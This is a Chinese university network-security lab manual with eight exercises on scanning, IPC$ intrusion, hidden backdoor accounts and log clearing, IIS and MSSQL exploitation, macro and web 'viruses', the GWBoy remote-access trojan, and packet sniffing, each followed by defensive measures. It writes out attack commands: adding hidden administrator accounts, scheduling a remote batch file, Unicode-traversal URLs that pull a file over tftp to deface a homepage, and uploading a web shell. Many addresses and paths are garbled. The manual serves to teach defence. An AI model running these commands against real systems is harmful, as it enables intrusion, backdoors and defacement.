网络安全实验

1、实验一 信息收集及扫描工具的使用 【实验目的】 掌握利用注册信息和基本命令实现信息搜集 掌握结构探测的基本方法 掌握 XSCAN 的使用方法 【实验步骤】 一、 获取 以及 的基本信息。 1、利用 ping 和 nslookup 获取 IP 地址 2、利用 ron.ac/service/index.html 以及 来获取信息 二、 使用 visualroute 或者下载 pingplotter 来获取到达的结构信息。 三、 获取局域网内主机 192.

2、168.4.100 的资源信息。 1、pinga 00 t 获取主机名 2、netstat a 00 获取所在域以及其他信息 3、net view 00 获取共享资源 4、nbtstata 00 获取所在域以及其他信息 四、使用X-SCAN 扫描局域网内主机00。 图 1-1 X-SCAN 主界面 1、设置扫描地址范围。图 1-2 X-SCAN 扫描范围设置 2、在扫描模块中设置要扫描的项目。 图 1-3 X-SCAN 扫描模块设置 3、设置并发扫描参数。图 1-4 X-SCAN 扫描

3、参数设置 4、在扫描中跳过没有响应的主机。图 1-5 X-SCAN 其他参数设置 5、设置要检测的端口及检测方式。 图 1-6 X-SCAN 检测方式设置 6、开设扫描，查看扫描报告。 【实验报告】 1、写出实验内容一中要求所获取的信息。 2、画出从本地主机到达 的结构信息。实验二 IPC$入侵的防护 【实验目的】 掌握 IPC$连接的防护手段 了解利用 IPC$连接进行远程文件操作的方法。 了解利用 IPC$连接入侵主机的方法。 【实验步骤】 一、IPC$连接的建立与断开。 通过 IPC$连接远程目标主机的条件是已获得目标主机管理员帐号和密码。 1、单击“开始”“运行

4、”，在“运行”对话框中输入“cmd”。 图 2-1 运行 CMD 2、建立 IPC$连接，键入命令 net use1ipc$ “qqqqqq” /user: “administrator”。 图 2-2 建立 IPC$连接 3、映射网络驱动器，使用命令：net use z:1c$。 4、映射成功后，打开“我的电脑” ，会发现多了一个Z盘，该磁盘即为目标主机的 C盘。图 2-3 资源管理器 5、查找指定文件，用鼠标右键单击 Z盘，选择“搜索” ，查找关键字“账目” ，结果如图所 示。将该文件夹复制、粘贴到本地磁盘，其操作就像对本地磁盘进行操作一样。

5、 6、断开连接，键入”net use */del”命令断开所有的 IPC$连接。 图 2-4 断开 IPC 连接 7、通过命令 net use目标 IPipc$del 可以删除指定目标 IP 的 IPC$连接。 二、建立后门账号 1、编写 BAT 文件。打开记事本，键入“net user sysback /add”和“net localgroup administrators sysback/add”命令，编写完后，另存为“hack.bat”。如图所示。 图 2-5 hack.bat 编辑2、与目标主机建立 IPC$连接。 3、 复制文件到目标主机。 打开 MSDOS， 键入“copy hac

6、k.bat 1d$”命令。 COPY 命令执行成功后，就已经把 E盘下的 hack.bat 文件拷贝到 1 的D 盘内。 图 2-6 hack.bat 复制 4、通过计划任务使远程主机执行 hack.bat 文件，键入”net time 1”命令，查看目标系统时间。 图 2-7 hack.bat 远处执行 5、如果目标系统的时间为 23：22，则可键入“at 1 23:30 d:hack.bat”命令， 计划任务添加完毕后，使用命令“net use */del”断开 IPC$连接。 6、验证帐号是否

7、成功建立。等一段时间后，估计远程主机已经执行了 hack.bat 文件。通过 建立 IPC$连接来验证是否成功建立“sysback”帐号。若连接成功，说明管理员帐号“sysback” 已经成功建立连接。 三、安全解决方案 1、在 PC（地址为 1）删除默认共享，通过“net share”了解共享资源。 图 2-8 共享资源 2、建立 BAT文件，文件名为 noshare.bat，内容如下： “net share ipc$ /del net share c$ /del net share d$/del”3、将其复制到本机“开始”“程序”“启动”中。 4、禁止空连接，将该命

8、令“net stop server /y”加入 noshare.bat 文件中，或通过打开“控制 面板”“管理工具”“服务” ，在列表中找到 Server，使用鼠标右击该服务，在弹 出菜单中选择属性，选择“禁用” 。 图 2-9 关闭 Server 服务 【实验报告】 1、与远程主机建立 IPC$需要满足什么条件？ 2、建立了 IPC$连接能够做哪些工作？实验三 留后门与清脚印的防范 【实验目的】 了解帐号后门以及防范手段 掌握手工克隆帐号原理 掌握日志清除的防范方法 【实验需求】 计算机两台，要求安装 Windows 2000 操作系统 交换机一台、直连线两根 权限提升工具 PSU.exe

9、【实验步骤】 一、设置隐藏帐号 1、试运行权限提升工具 PSU.exe 测试结果如图。 图 3-1 PSU使用说明 2、进入任务管理器，查看 SYSTEM 的 PID 号 如图 PID 为 8。图 3-2 任务管理器 3、使用 PSU工具把它加载到注册表中。 图 3-3 PSU 工具把它加载到注册表 4、在注册表中找到存放系统帐号名称以及配置信息的注册项。图 3-4 注册表 5、找到 Administrator 查看他的类型如图.它的类型为 0x1f4 图 3-5 注册表 6、由于采用 16 进制换算过来就是 F4 这个项， 所以我们知道 F4 这个项存放的 就是系统管理员的权限及配置信息。

10、图 3-6 注册表 7、打开里面的 F 项把里面的 16 进制数据复制出来。图 3-7 注册表编辑 8、使用刚才的方法找到 GUEST用户打开相同的项把刚才复制的 16 进制数据粘贴进去。 图 3-8 注册表修改 9、为了隐蔽性我们把 GUEST 帐号禁用首先在命令行模式下键入”net user guest /active:no。 图 3-9 GUEST 帐号禁用 10、 下面我们来看下当前Guest 帐号的状态在命令行下输入 “net user Guest”。 由图 3-10 可以看出 Guest 用户只属于 Guest 组， 接下来打开计算机管理中的帐号中的帐号管理可以发 现 Guest

11、用户已经被禁用了。图 3-10 系统帐号查看 11、注销后用Guest 帐号登陆发现桌面配置与 Administrator 用户完全一样，下面我们用这 个帐号执行一个只有系统管理员才有权执行的操作，如果成功那表示这个帐号后门可用。 图 3-11 增加用户 二、清除日志： 1、首先制作一个 DOS下的批处理文件用于删除所有的日志，把它保存为.bat 文件。 图 3-11 增加用户 二、清除日志： 1、首先制作一个 DOS下的批处理文件用于删除所有的日志，把它保存为.bat 文件。 置它的运行时间。图 3-13 删除日志文件运行 4、通过检查被攻击主机的日志信息，可以发现内容为空。 三、安全解决方

12、案 1、杜绝 Guest 帐户的入侵。可以禁用或彻底删除 Guest 帐户，但在某些必须使用到 Guest 帐户的情况下，就需要通过其它途径来做好防御工作了。首先要给 Guest 设一个强壮的 密码，然后详细设置Guest 帐户对物理路径的访问权限（注意磁盘必须是NTFS 分区）。 例如禁止 Guest 帐户访问系统文件夹。可以右击“WINNT”文件夹，在弹出菜单中选择 “安全”标签，从中可看到可以访问此文件夹的所有用户。删除管理员之外的所有用户 即可. 图 3-14 禁止 Guest帐户访问系统文件夹 2、日志文件的保护。首先找出日志文件默认位置，以管理员身份登录进系统，并在该系统 的桌面中

13、依次单击“开始”“运行”命令，在弹出的系统运行对话框中，输入字符串 命令“compmgmt.msc” ，单击“确定”按钮后打开服务器系统的计算机管理窗口。图 3-15 计算机管理窗口 3、其次在该管理窗口的左侧显示窗格中，用鼠标逐一展开“系统工具”“事件查看器” 分支项目，在“事件查看器”分支项目下面我们会看到“系统” 、 “安全性”以及“应用 程序”这三个选项。要查看系统日志文件的默认存放位置时，我们可以直接用鼠标右键 单击“事件查看器”分支项目下面的“应用程序”选项，从随后弹出的快捷菜单中执行 “属性”命令。在该窗口的常规标签页面中，我们可以看到本地日志文件的默认存放位 置为“C:WIND

14、OWSsystem32configAppEvent.Evt” 。 图 3-16 属性设置窗口 4、做好日志文件挪移准备，为了让服务器的日志文件不被外人随意访问，我们必须让日志 文件挪移到一个其他人根本无法找到的地方，例如可以到 E 分区的一个“E:aaa”目 录下面创建一个“bbb”目录 5、正式挪移日志文件，将对应的日志文件从原始位置直接拷贝到新目录位置 “E:aaabbb”下 6、修改系统注册表做好服务器系统与日志文件的关联，依次单击系统桌面中的“开始” “运行”命令，在弹出的系统运行对话框中，输入注册表编辑命令“regedit” ，单击回车键后，打开系统的注册表编辑窗口；用鼠标双击“HK

15、EY_LOCAL_MACHINE”注册表子键， 在随后展开的注册表分支下面依次选择“SYSTEM” 、 “CurrentControlSet” 、 “Services” 、 Eventlog”项目，在对应“Eventlog”项目下面我们会看到“System” 、 “Security” 、 “Application”这三个选项 图 3-17 注册表编辑窗口 7、在对应“System”注册表项目的右侧显示区域中，用鼠标双击“File”键值，打开如图 2 所示的数值设置对话框， 然后在“数值数据”文本框中，输入“E:aaabbb SysEvent.Evt”字符串内容，也就是输入系统日志文件新的路径信

16、息，最后单击“确定” 按钮；同样地，我们可以将“Security” 、 “Application”下面的“File”键值依次修 改为“E:aaabbb SecEvent.Evt” 、 “E:aaabbb AppEvent.Evt” ，最后按一下键盘 中的 F5 功能键刷新一下系统注册表，就能使系统日志文件的关联设置生效了。 图 3-18 注册表编辑窗【实验报告】 1、帐号克隆是什么意思？留后门的作用是什么？ 2、请简述本次试验中遇到的问题和解决的方法。实验四 基于 IIS服务器攻击的防护 【实验目的】 练习使用X-Scan V3.3 GUI扫描工具； 了解不同漏洞的入侵方式，并掌握各种漏洞解决

17、方案 【实验内容】 练习基于*.ida 的入侵 练习基于.printer 漏洞的入侵 练习基于 Unicode漏洞的入侵 【实验工具】 本地主机不限制操作系统 远程主机操作系统：Windows 2000 或 Windows 2000 Sp1 或 Windows 2000 Sp2 工具 X-Scan V3.3 GUI、idahack.exe 或 ida.exeIDA 溢出工具、iisx.exe、 tftpd32.exe 【实验步骤】 一、基于*.ida 漏洞的入侵 1、扫描远程服务器，寻找有漏洞的主机。打开 X-scan，按照如图 4-1 和图 4-2 所示，填好 扫描项目， 开始扫描远程主机。

18、 扫描完毕后， 在扫描报告中， 发现远程服务器 01 存在 IIS .IDA ISAPI过滤器漏洞。图 4-1 选择扫描范围 图 4-2 选择扫描模块 在浏览器的地址栏中输入 01/*.ida”,返回信息“文件 c:inetpubwwwroot*.ida。 文件名、目录名或卷标语法不正确。 ”如图 4-3 所示，确认远 程主机存在漏洞，并得到远程服务器提供 Web 服务的根目录是 c:inetpubwwwroot。 2、IDA 溢出，将工具 IDAHack.exe 拷贝到%systemroot%/system32目录下。通过“运行”

19、“cmd”打开命令提示符，在命令行下输入“idahack 01 80 1 520”(说明： 目标主机没有打补丁，因此主机类型是 1)，打开端口号 520（如图 3.45），等待 Telnet 登 录。图 4-3 IDA溢出 注释：如果使用 ida.exe 工具，则在命令行中输入“ida 01 80 0”即可打开 telnet 端口号 99。 3、Telnet 登录，在 MS-DOS 中键入“telnet 01 520”命令远程登录服务器 （如图 4-4所示）。该 telnet 登录并无身份验证， 如果登录成功，立即得到 S

20、HELL， 该 SHELL 拥有管理员权限，可以在其中执行任何命令。 图 4-4 输入telnet命令 图 4-5 成功入侵 4、建立帐号,如图 4-5 入侵成功后，在远程服务器上建立管理员帐号，如图 4-6： 图 4-6 在远程主机上创建管理员帐号 此时，入侵者便获得了一个远程主机上的管理员帐号，可以通过系统认证来“合法”地 使用“计算机管理”或“DameWare”等工具远程控制服务器，并且在远程服务器上添加了后 门帐号。 5、使用“exit”命令退出登录。 6、防护为 Windows 2000 操作系统打 SP4 补丁。Windows 2000 Service Pack 4 的下载地址是

21、/china/windows2000/downloads/SP4.mspx，下载页面如图 4-7 所示。 图 4-7 Windows 2000 Service Pack 4下载页面 （2）为该漏洞安装补丁 Windows NT 4.0 的补丁下载网址： /Downloads/Release.asp?ReleaseID=30833 Windows 2000 Professional/Server/Advanced Server 的补丁下载网址： /Downlo

22、ads/Release.asp?ReleaseID=30800 Windows XP beta 在正式版本得到解决。 （3）删除.ida&.idq的脚本映射 建议：即使已经为该漏洞安装了补丁最好还是删除.IDA 映射。 删除方法：打开 Internet 服务管理器；右击服务器并在菜单中选择“属性” ；选择“主 属性” ，选择 WWW 服务 - 编辑 - 主目录 - 配置，在扩展名列表中删除.ida 和.idq 项。 二、基于.printer 漏洞的入侵 1、使用 X-Scan 工具扫描远程服务器（略）。 2、使用 iisx.exe 工具连接有.printer漏洞的主机

23、01，如图 4-8。 图 4-8 使用 iisx 连接远程主机 3、执行 Telnet 命令：Telnet 01 7788，入侵远程主机。 4、在远程主机上创建管理员后门帐号（略）。 5、使用“exit”命令退出登录。 6、防护 （1）为 Windows 2000 操作系统打 SP4 补丁。Windows 2000 Service Pack 4 的下载地址是 /china/windows2000/downloads/SP4.mspx（下载页面见前面图4-7 所示）。 （2）安装漏洞补丁。 该漏洞补丁的下载地址是 http:/

24、/Downloads/Release.asp?ReleaseID=29321 三、 “涂鸦”主页 1、准备标语。用网页设计软件，如 DreamWeaver、FrontPage 制作一个标语网页，保存为 l.htm。 2、探知远程服务器的 web 根目录。首先查找被修改主页文件保存在哪里。利用 Unicode 漏 洞找出 Web 根目录所在。通过查找文件的方法找到远程服务器的 Web 根目录。在 IE 中输入 “01/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir+c:mmc .g

25、if/s，其中“/s”参数加在 dir 命令后表示查找指定文件或文件夹的物理路径，所以 “dir+c:mmcgif”表示在远程服务器的 C盘中查找 mmc.gif 文件。由于文件 mmc.gif 是 IIS 默认安装在 Web根目录中,所以在找到该文件的同时， 也就找到了 Web 根目录。 如图 4-9。 图 4-9 查找Web 服务器根目录 3 、 涂鸦主页 。 涂鸦主页之前 ， 可以利用 Unicode 漏洞 ， 在地址栏中输入 01/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir+c:inetp ubwww

26、root 来遍历根目录下的文件。通常主页的文件名一般是 index.htm，index.html， default.asp，default.htm 等。由图 4-10 可知，远程主机的主页是 index.htm。因此，此 时只需要将我们制作的标语文件 1.htm 上传到远程主机的 Web 根目录下覆盖掉 index.htm 就可以了。在本机运行 TFTP 服务器（tftpd32.exe）,此时不需要做任何设置，只要把 1.htm 文件拷贝到 TFTP 服务器的路径下，通过 tftp 命令就能将 1.htm下载到远程主机。 图 4-10 Web根目录注释：Tftp工具的使用方式如下表所示： 工具

27、描述 Windows 自带命令，专门用于从 tftp 服务器上下载和上传文件。 命令格式 TFTP -i host GET|PUT sourse destination 参数说明 -i：二进制文件传输；host：TFTP 服务器地址；GET：下载文件；PUT：上传文 件； Source：文件名；Destination：目的地 利用 Unicode 漏洞使用 TFTP 命令把本机上的 1.htm上传到远程主机的 Web 根目录下， 使用命令“tftp++get+1.htm+c:inetpubwwwrootindex.htm” 覆盖远程主机 上的主页文件。在浏览器的地址栏里

28、输入： “01/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+tftp+192.1 68.26.12+get+1.htm+c:inetpubwwwrootindex.htm”之后，得到结果如图 4-11所示，已 经完成上传文件的任务。 图 4-11 上传覆盖文件 4、 重新登录远程主机的网站。 刷新后， 即可看到刚才下载到目标主机的标语文件， 如图 4-12 所示。 “涂鸦”主页成功。 图 4-12“涂鸦”后的主页 5、防护 （1）为 Windows 2000 操作系统打 SP4 补丁。Windows 2000 Ser

29、vice Pack 4 的下载地址是 /china/windows2000/downloads/SP4.mspx。 （2）安装漏洞补丁。该漏洞补丁的下载地址是 /kb/（也可 以使用文中所提供的该漏洞补丁的下载地址）。在该页面中选择与自己的操作系统相应的补 丁下载并安装。例如如果所使用的操作系统是简体中文版，且 IIS 的版本是 5.0，则选择该 页面中的“Chinese (Simplified) Language Version”下载并安装即可。如图4-13所示。图 4-13 下载漏洞补丁 （

30、3）临时解决方法。如果不需要可执行的 CGI，可以删除可执行虚拟目录，例如 /scripts 等。如果确实需要可执行的虚拟目录，建议可执行虚拟目录单独在一个分区。 【实验报告】 1、请简述 IIS 漏洞有哪些？ 2、简述网页涂鸦的方法。实验五 基于 SQL Server服务器攻击的防护【实验目的】 通过对 MSSQL的入侵，了解入侵者的入侵方式 掌握 MSSQL的入侵的防护措施 【实验环境】 本地主机不限制操作系统 远程主机操作系统：Windows 2000 + SQLServer 2000 工具 MS SQL 客户端或者是第三方软件，本实验采用第三方软件 SqlExec.exe（命 令行）

31、X-Scan V3.3 GUI或 SQLServerSniffer.exe 后门 SqlRootkit.asp tftpd32.exe 【实验步骤】 一、利用 MSSQL空口令入侵 在 Windows 2000 中，企业级用户一般均使用微软的数据库管理软件 MS SQL Server， 在安装 MS SQL Server 后，将产生默认的 SA用户，且初始密码在管理员未设置的情况下为 空，但 SA为 SQL Server 中非常重要的安全模块成员，因此入侵者即可通过 SQL Server 客 户端或其他工具进行数据库远程连接，从而在 MS SQL Server 服务器上新建管理员级别的 Adm

32、inistrators 组用户。具体步骤如下： 1、利用 X-Scan V3.3 GUI 或者 SQLServerSniffer.exe 进行扫描，找出 sa 空口令主机 01。 2、将命令行工具 SqlExec.exe 拷贝到本地主机%systemroot%system32 目录下。在 MS-DOS 中键入命令： sqlexec 01， 当出现如图3.56所示画面， 表示入侵成功， 并有了system 权限，可以创建用户、更改用户密码等。 图5-1利用空口令入侵成功 3、创建远程主机的用户帐号：net user SQLhack /add，帐号创

33、建完成后，会自动断开与远程主机的连接。 4、通过 sqlexec工具重新入侵远程主机，将所建用户SQLhack加入到 administrators 组中， 使用户具有较高的管理权限：net localgroup administrators SQLhack /add。入侵者成功入侵了 远程主机，并在远程主机上拥有了管理员组的用户，可以通过该帐号利用“计算机管理” 、 建立 IPC$管道连接等方式进一步控制目标服务器。 5、防守 MSSQL空口令入侵 （1）为 SA用户设置密码； （2）为 Windows 2000 安装 Service Pack 3 或 Service Pack 4。 二、利用

34、 SQL后门攻击 MSSQL服务器 对于安装网络防火墙的远程服务器，即使入侵者掌握了 SQL 服务器的 SA 密码也不容 易连接到该计算机中的 SQL服务器。而且网络防火墙对 SQL端口特别敏感，总是滤掉发往 1433 端口的连接请求。但在实际中，入侵者能够制作一种 SQL后门。只要把该后门文件放 入远程服务器的Web根目录下， 入侵者就可以通过IE浏览器在远程服务器中执行任何命令。 此外，由于网络防火墙不会滤掉发往 Web 服务器的连接请求，因此该后门对于那些同时提 供 Web 服务的远程服务器尤其适用。现在攻击运行着 SQL和 Web 服务器的 01 为例： 1、

35、利用 X-Scan工具对远程服务器进行弱口令扫描， 如图 3-50 所示， 远程主机 01 的 SA密码是 123。 2、用记事本打开 SqlRootkit.asp，将 SqlRootkit.asp 中 SQL 管理员帐号和密码修改成“sa” 和“123” 。 3、利用 WebDAV漏洞，将 SqlRootkit.asp传至远程服务器 web 根目录下。 （1）查找 Web 根目录，得知是“c:inetpubwwwroot” ； （2）运行 tftpd32.exe，并将 SqlRootkit.asp拷贝到 tftpd32.exe目录下； （3）利用 WebDAV漏洞上传

36、 SqlRootkit.asp到 c:inetpubwwwroot 目录中，使用的命 令为“tftp+2+get+SqlRootkit.asp+c:inetpubwwwroot” ，其中 2 是 tftp服务器。 4、通过 IE 浏览实现远程控制。 打开 IE，在浏览器中输入：01SqlRootkit.asp 来访问远程服务器，得 到命令输入界面。在该界面可以通过 net 命令实现远程控制。并且能够通过 net user 命令建 立帐号，并把所建帐号添加到管理员组，使远程服务器提供帐号后门。 5、防护 可以通过

37、消除 WebDAV漏洞来防止该攻击的发生。Windows 2000 操作系统的 4 个版本，以 及打了SP1、 SP2、 SP3补丁Windows 2000 操作系统都存在WebDAV漏洞。 然而Windows 2000 SP4 就已经弥补了该漏洞。因此，安装了 Windows 2000 操作系统之后， 及时为系统打上 SP4 补丁可以有效地组织上述攻击的发生。Windows 2000 Service Pack 4 的下载地址是 /china/windows2000/down loads/SP4.mspx 所示。 【实验报告】 1、SP4 指什么意

38、思，它的作用是什么？2、简述本次试验中遇到的问题和解决的方法。实验六 宏病毒及网页病毒的防范 【实验目的】 了解宏病毒、网页病毒的运行环境、运行平台和传播手段； 掌握 Word 宏病毒的防范； 掌握使用 ASP 脚本网页病毒的防范； 【实验原理】 宏病毒是利用了一些数据处理系统内置宏编程指令的特性而形成的一种特殊病毒。 它和 其它一般的病毒不同， 它是依附在正常的Word 文件上，利用 Word 文档可执行其内部宏命令 代码的方式，在Word 文档打开或关闭时来控制并感染系统。中了宏病毒，轻则文件被破坏， 重则格式化硬盘，使数据毁于一旦。 对于网页病毒的制作，可以使用 ASP 脚本开发语言。微

39、软推出的该脚本语言，可以将 VBScript 代码添加到HTML 页面中，从而方便在编写Web 应用程序时实现系统功能的应用。 然而这也为一些目的不良的人提供了方便， 使得制作网页病毒十分简单， 网页病毒大量泛滥。 【实验步骤】 一、宏病毒的制作 1、首先启动 Word2000 或者 Word2003，在窗口菜单栏中选择“插入”“对象” ，在弹出的 图 6-1 所示的窗口中选择“对象类型”列表的“包”选项，然后点击“确定” 。 图 6-1 插入包对象 2、完成后将弹出图 6-2 所示的“对象包装程序”对话框窗口，再点击窗口中的“编辑”“命 令行” 菜单项， 在弹出的 “命令行” 对话框窗口中输

40、入 “C:Windowssystem32telnet.exe” ， 完成后点击“确定” 。图 6-2 对象包装程序 3、然后在“对象包装程序”窗口中点击“插入图标”按钮，为该命令行选一个有诱惑力的 图标，然后关闭“对象包装程序”窗口，此时就在文档相关位置出现了一个和相关命令关联 的图标，如图 6-3 所示。也可以在图标旁边加点鼓动性的文字，尽量让浏览者看到后想用鼠 标点击，这样一个简单的宏病毒就做成功了。 图 6-3 一个简单的宏病毒 4、宏病毒的清除，使用杀毒软件检查 Word 安装目录下的 Startup 目录文件和 Normal.dot 文件。 5、只打开Word 而不是双击文档，选择“

41、工具”菜单下的“宏”选项，在“安全性”选项中 将“安全级”设为“高” 。图 6-4 宏病毒的防范 二、网页病毒的制作 1、代码编辑 首先，我们使用写字板中编辑如下代码： 其中，之间的是写入的 VBScript脚本。脚本通过 Dim 语句声明了一个对象变量， 而后使用 Set fso=Server.CreateObject(Scripting.FilesystemObject)产生一个服务器 系统对象。使用 fso.CreateTextFile(d:myfile)在 d 盘根目录建立一个文件 myfile， 并且使用 response.write(新建文件 myfile)在页面中说明建立的完成。

42、 2、执行脚本编写的代码。要执行上述代码，首先要配好 IIS 服务和 Web服务器。 3、当 Web 服务器配置完成，将上述编辑好的代码保存到 Web 服务器的路径中，例如 “C:Inetpubwwwroottest.asp” 。 4、打开 IE 浏览器，在地址栏中输入“ http:/localhost/test.asp” ，运行脚本。这时， 如果脚本没有语法错误则将在网页中输出“新建文件myfile” ，并且在d 盘根目录下建立了 一个文件 myfile，如图 6-5 所示。 图 6-5 网页病毒 5、网页病毒的防范，使用“regsvr32 scrrun.dll /u”命令禁用文件系统对象

43、“FileSystemObject” 。 6、自定义安全级别，打开 IE 浏览器，在“Internet 选项”“安全”选项中选择“自定 义安全级别” ，把“ActiveX 控件及插件”的一切设为禁用。图 6-6 网页病毒的防范 【实验报告】 1、针对网页病毒的基本制作过程。写出如何通过类似的方式来控制注册表、查询系统信息、 将其它类型的病毒、木马加入我们的网页中。实验七 第四代木马的防御 【实验目的】 了解第四代木马的特点； 了解反弹技术及连接方式； 掌握第四代木马广外男生的防范技术； 【实验设备】 操作系统平台：Win2000 或 WinXp。 木马工具：广外男生。 【实验原理】 广外男生同

44、广外女生一样，是广东外语外贸大学的作品，是一个专业级的远程控制及网 络监控工具。广外男生除了具有一般普通木马应该具有的特点以外，还具备以下特色： 客户端模仿 Windows资源管理器：除了全面支持访问远程服务器端的文件系统，也同时 支持通过对方的“网上邻居”访问对方内部网其他机器的共享资源。 强大的文件操作功能：可以对远程机器进行建立文件夹，整个文件夹的一次删除，支持 多选的上传、下载等基本功能。同时支持对远程文件的高速查找，并且可以对查找的结果进 行下载和删除操作。 运用了“反弹端口”与“线程插入”技术：使用了目前流行的反弹端口的木马技术，可 以在互联网上访问到局域网里通过 NAT代理上网的

45、电脑，轻松穿越防火墙。 “线程插入” 技术是指在服务器端运行时没有进程， 所有网络操作均插入到其它应用程 序的进程中完成。因此，服务器端的防火墙无法进行有效的警告和拦截。 “反弹端口”技术是指，连接的建立不再由客户端主动要求连接，而是由服务器端来完 成，这种连接过程正好与传统连接方式相反。当远程主机被种植了木马之后，木马服务器在 远程主机上线之后主动寻找客户端建立连接， 客户端的开放端口在服务器的连接请求后进行 连接、通信。 【实验步骤】 一、广外男生的基本使用 1、客户端设置：打开广外男生客户端（gwboy092.exe），选择“设置”“客户端设置” ， 打开“广外男生客户端设置程序” ，如

46、图 7-1 所示。其中最大连接数一般使用默认的 30 台， 客户端使用端口一般设置成 80。图 7-2 广外男生客户端连接类型设置 3、点击“下一步” ，再点击“完成”按钮结束客户端的设置。 4、服务端设置：进行服务端设置时，选择“设置”“服务器设置” ，打开“广外男生服 务端生成向导” ，如图 7-3 所示。 图 7-3 广外男生服务器端设置 5、选择“同意”之后，点击下一步，开始进行服务端常规设置，如图 7-4 所示。其中，EXE 文件名是安装木马后生成的程序名称，DLL 文件名是安装木马后生成的 DLL 文件的名称图 7-4 广外男生服务器端常规设置 6、设置完成后点击“下一步” ，进行

47、“网络设置” 。根据实际网络环境，选择静态IP 选项进 行实际网络的设置，如图 7-5所示。 图 7-5 广外男生服务器端网络设置 7、设置完成点击“下一步” ，填写生成服务器端的目标文件的名称，然后点击“完成” ，结 束服务器端的配置，如图 7-6所示。 图 7-6 广外男生服务器端的目标文件 8、种植木马：将生成的目标文件发送到远程主机，然后在远程主机运行。9、重新启动远程主机，在客户端进行观察等待远程主机的连接，并对远程主机的运行进行 监控。如图 7-7所示，服务器与客户端连接成功；图 7-8 展示的是客户端看到的远程主机的 文件系统；图 7-9 展示的是通过客户端看到的远程主机的注册表

48、。 图 7-7 远程主机连接成功 图 7-8 文件共享 图 7-9 远程注册表二、广外男生木马的清除 1、检测广外男生木马的有效方法为使用“netstat -na”查看目标主机的网络连接情况，如 果端口 8225开放，那么该主机可能已经中了广外男生木马。 2、打开注册表编辑器，展开到“HKEY_LOCAL_MACHINE”“SOFTWARE”“Microsoft”“Windows” “CurrentVersion”“Run”下，删除字符串指 gwboy.exe。然后到“HKEY_LOCAL_MACHINE” “SOFTWARE”“Classes”“CLSIDT” ，删除 ID 为5EAE4AC

49、0-146E-11D2-A96E-9 的键及其下所有子键和键值。 3、点击 “编辑”菜单中的 “查找” ，在注册表编辑器中搜索 gwVboydl1。dll，找到所有 和它有关的注册表项，全部删除。 5、删除 system32 目录下的 gwboy.exe 。 然后进入 DOS 模式下 ， 输入 del winntsystem32gwVboydll.dll 命令，删除 system32 目录中的 gwboydll.dll 文件。 【实验报告】 1、简述第一代到第四代木马的显著特征。 2、简述木马的功能和防护方法。实验八 Sniffer Pro的抓包与发包 【实验目的】 掌握 Sniffer pr

50、o的安装与基本界面的使用 利用工具栏进行网络监控 使用 Sniffer pro进行数据的捕获 了解报文发送功能 【实验设备】 集线器或采用端口镜像的交换机、路由器 服务器、计算机两台或多台 网线 【实验步骤】 一、Sniffer pro安装，与其他任何Microsoft Windows 上的应用程序一样简单，对于计算 机系统的要求极低，采用标准的 Installshield Wizard 来指导安装。 1、双击 Setup.exe启动安装，会看到 Installshield Wizard 屏幕，单击 Next 按钮继续。 图 8-1 Sniffer pro 安装向导 2、安装程序会找出安装所需

51、文件，下面出现欢迎屏幕，单击Next 按钮继续下一步。图 8-2 Sniffer pro 安装向导 3、仔细阅读软件安装协议，如果同意，点击Yes 按钮继续，然后输入用户信息。 图 8-4 Sniffer pro 安装向导 4、指定安装位置，点击 Next 继续。图 8-5 Sniffer pro 安装向导 5、安装程序开始复制文件，结束后 Sniffer pro 会要求用户注册，包括用户姓名（Name）、 单位（Business）、用户类型（Customer Type）和电子邮件（E-mail），输入完毕后点击 Next 继续。 图 8-6 Sniffer pro 安装向导 6、接着输入你的

52、地址（Address）、所在城市（City）、州/省（State）、国家（Country）、邮政 编码（Postal Code）和电话号码（Phone）以及传真（Fax），输入完毕后点击 Next 继续。 图 8-7 Sniffer pro 安装向导 7、输入序列号，然后点击 Next 继续。图 8-8 Sniffer pro 安装向导 8、接着需要通过因特网与 NAI联系进行注册，有三种方式 1）选择与因特网直连，直接进 行注册；2）通过代理与因特网连接，此时需要设置代理参数；3）没有与与因特网连接，需 要通过传真注册；一般情况可选择选项1。 图 8-9 Sniffer pro 安装向导 9

53、、软件与 NAI 服务器连接上，就会注册，并提供一个客户号，点击 Next 就会出现注册成 功的信息。 图 8-10 Sniffer pro 安装向导 10、 点击 Finish完成。 安装软件会通知如果运行 Sniffer pro 必须有微软的IE5 或更高版本， 并且安装微软的 JAVA虚拟机。 二、工具栏的使用 具体操作见 5.1 节内容 三、捕获栏的使用，使用 Sniffer Pro捕获 ICMP 流量。 1、点击定义过滤器按钮，单击配置文件（Profiles）按钮，新建（New）一个配置文件，取 名为 ICMP,如下图：图 8-11 Sniffer pro过滤器定义 2、点完成（Do

54、ne）后，在屏幕右侧选择 ICMP，然后点击高级（Advance）按钮，进入高级 选项卡，因为我们只需要监听ICMP 报文，所以选中 IP 下的 ICMP协议，如下图： 图 8-12 Sniffer pro 过滤器协议定义 3、点击确定，完成定义过滤器。选择 ICMP 过滤器，进行监听，点击开始按钮。图 8-13 Sniffer pro 捕获高级系统 4、 在本地主机 （IP： 53） 利用 Ping 命令测试与相邻主机 （IP： 8） 的连通性。当捕获到 ICMP 报文时，点击停止并显示按钮，点击视图下方的解码（Decode） 选项，如下图：

55、图 8-14 Sniffer pro 解码 5、可以发现监听到的 ICMP Echo Request 回送请求，源地址（Source Address）： 53 目的地址（Destination Address）：8。 四、报文的发送 1、在解码卷标中，在“总结”选项中选中捕获的 ICMP 报文，点击“HEX”部分，点击鼠标 右键，选择编辑（Edit）修改源地址（Source Address）为 55。 图 8-15 Sniffer pro 十六进制代码编辑 2、点击重新插入（Re-interpret），此时在“HEX”部分的源地址（Source Address）就发生 了变化。然后点击鼠标右键，选择发送当前报文（Sent Current Frame）。图 8-16 Sniffer pro 编码发送 3、发送次数为（Times）为 100 次，延迟（Delay）为 1 毫秒，点击确定。如果将选中连续